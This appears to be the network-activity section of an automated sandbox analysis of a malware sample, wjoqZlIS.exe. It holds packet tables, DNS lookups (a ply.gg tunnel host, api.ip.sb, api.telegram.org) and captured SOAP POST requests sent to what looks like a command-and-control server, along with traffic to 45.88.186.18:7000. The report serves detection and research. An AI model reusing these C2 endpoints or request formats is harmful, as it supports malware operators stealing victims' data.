                                                                                Jul 16, 2024 21:07:13.943789005 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943830967 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.943871975 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943881035 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943901062 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943917990 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943924904 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.943939924 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.943948030 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943958998 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943968058 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.943969011 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.943983078 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.943994045 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944014072 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944021940 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944032907 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944075108 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944091082 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944101095 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944108963 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944133043 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944152117 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944152117 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944166899 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944191933 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944195986 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944211960 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944238901 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944257021 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944276094 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944286108 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944314003 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944328070 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944336891 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944345951 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944354057 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944363117 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944377899 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944384098 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944402933 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944426060 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944478035 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944508076 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944519997 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944525957 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944533110 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944544077 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944554090 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944572926 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944582939 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944596052 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944606066 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944622040 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944623947 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944633961 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944648027 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944681883 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944683075 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944715023 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944727898 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944736958 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944746971 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944756985 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944758892 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944766998 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944772005 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944791079 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944791079 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944802999 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944808960 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944812059 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944822073 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944833994 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944861889 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944864988 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944873095 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944891930 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944901943 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944911003 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.944971085 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944981098 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944988966 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.944998026 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945044994 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945055008 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945131063 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945141077 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945166111 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945178032 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945236921 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945246935 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945257902 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945346117 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945354939 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945363998 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945373058 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945383072 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945391893 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945450068 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945458889 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945462942 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945473909 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945493937 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945616961 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945626020 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945630074 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945638895 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945647955 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945671082 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945696115 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945705891 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945746899 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945756912 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945765972 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945775986 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945785999 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945818901 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945828915 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945837975 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945883989 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945894957 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945966959 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945976973 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.945985079 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946110010 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946263075 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946273088 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946280956 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946290016 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946300030 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946310043 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.946321011 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:13.970366001 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:13.975318909 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:14.649275064 CEST933649738147.185.221.20192.168.2.4
                                                                                Jul 16, 2024 21:07:14.686018944 CEST497379336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:14.686470032 CEST497389336192.168.2.4147.185.221.20
                                                                                Jul 16, 2024 21:07:26.580599070 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:26.580646992 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:26.580723047 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:26.586972952 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:26.587058067 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:27.212874889 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:27.212960005 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:27.217207909 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:27.217237949 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:27.217648983 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:27.279992104 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:27.320576906 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:27.532825947 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:27.532907009 CEST44349745149.154.167.220192.168.2.4
                                                                                Jul 16, 2024 21:07:27.533035040 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:27.541403055 CEST49745443192.168.2.4149.154.167.220
                                                                                Jul 16, 2024 21:07:27.665505886 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:27.670746088 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:27.670845032 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:27.710227013 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:27.715507984 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:40.914617062 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:40.919631958 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:41.041030884 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:41.062982082 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:41.072789907 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:49.720726013 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:49.767148972 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:54.049020052 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:54.056180000 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:54.173265934 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:07:54.175458908 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:07:54.180380106 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:07.236238003 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:07.241177082 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:07.360369921 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:07.362879992 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:07.368968010 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:19.752585888 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:19.798329115 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:20.407951117 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:20.412981987 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:20.534259081 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:20.536144972 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:20.540997028 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:33.579921007 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:33.584827900 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:33.706310987 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:33.708604097 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:33.713506937 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:34.704807043 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:34.711711884 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:34.833762884 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:34.835392952 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:34.840375900 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:38.111109018 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:38.116164923 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:38.173860073 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:38.178839922 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:38.237965107 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:38.239489079 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:38.244401932 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:38.597297907 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:38.597636938 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:38.597716093 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:38.598669052 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:38.604367018 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:39.392919064 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:39.397799969 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:39.517800093 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:39.522290945 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:39.527996063 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:39.751717091 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:39.758814096 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:39.882244110 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:39.883714914 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:39.889446974 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:39.986097097 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:39.991817951 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:40.112039089 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:40.113358021 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:40.118837118 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:40.282839060 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:40.289017916 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:40.408025026 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:40.409467936 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:40.414591074 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:41.392895937 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:41.398011923 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:41.521390915 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:41.526226997 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:41.531369925 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:49.732553959 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:49.782599926 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:54.564570904 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:54.569565058 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:54.688723087 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:08:54.690742016 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:08:54.695543051 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.439138889 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.444197893 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.454654932 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.459585905 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.501674891 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.506616116 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.517452002 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.522418022 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.532881021 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.538017988 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.568495035 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.570353985 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.620268106 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.625375986 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.627542973 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.632462978 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.665036917 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.666543961 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.712281942 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.720381975 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.722424984 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.727335930 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:00.727391958 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:00.732356071 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:07.720506907 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:07.725668907 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:07.853192091 CEST70004974645.88.186.18192.168.2.4
                                                                                Jul 16, 2024 21:09:07.854397058 CEST497467000192.168.2.445.88.186.18
                                                                                Jul 16, 2024 21:09:07.859466076 CEST70004974645.88.186.18192.168.2.4

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jul 16, 2024 21:07:02.062232971 CEST5378053192.168.2.41.1.1.1
                                                                                Jul 16, 2024 21:07:02.072988987 CEST53537801.1.1.1192.168.2.4
                                                                                Jul 16, 2024 21:07:08.369249105 CEST5338553192.168.2.41.1.1.1
                                                                                Jul 16, 2024 21:07:26.559582949 CEST6196253192.168.2.41.1.1.1
                                                                                Jul 16, 2024 21:07:26.567786932 CEST53619621.1.1.1192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Jul 16, 2024 21:07:02.062232971 CEST192.168.2.41.1.1.10x9Standard query (0)pst-child.gl.at.ply.ggA (IP address)IN (0x0001)false
                                                                                Jul 16, 2024 21:07:08.369249105 CEST192.168.2.41.1.1.10x415bStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                                                Jul 16, 2024 21:07:26.559582949 CEST192.168.2.41.1.1.10x6c86Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Jul 16, 2024 21:07:02.072988987 CEST1.1.1.1192.168.2.40x9No error (0)pst-child.gl.at.ply.gg147.185.221.20A (IP address)IN (0x0001)false
                                                                                Jul 16, 2024 21:07:08.381776094 CEST1.1.1.1192.168.2.40x415bNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                Jul 16, 2024 21:07:26.567786932 CEST1.1.1.1192.168.2.40x6c86No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • api.telegram.org
                                                                                • pst-child.gl.at.ply.gg:9336

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449730147.185.221.2093366528C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jul 16, 2024 21:07:02.207060099 CEST248OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 137
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Connection: Keep-Alive
                                                                                Jul 16, 2024 21:07:02.683413982 CEST25INHTTP/1.1 100 Continue
                                                                                Jul 16, 2024 21:07:02.818061113 CEST359INHTTP/1.1 200 OK
                                                                                Content-Length: 212
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:02 GMT
                                                                                Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                                                Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                                                Jul 16, 2024 21:07:07.866453886 CEST231OUTPOST / HTTP/1.1
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                                                Host: pst-child.gl.at.ply.gg:9336
                                                                                Content-Length: 144
                                                                                Expect: 100-continue
                                                                                Accept-Encoding: gzip, deflate
                                                                                Jul 16, 2024 21:07:08.009381056 CEST25INHTTP/1.1 100 Continue
                                                                                Jul 16, 2024 21:07:08.181982040 CEST1236INHTTP/1.1 200 OK
                                                                                Content-Length: 4744
                                                                                Content-Type: text/xml; charset=utf-8
                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                Date: Tue, 16 Jul 2024 19:07:08 GMT
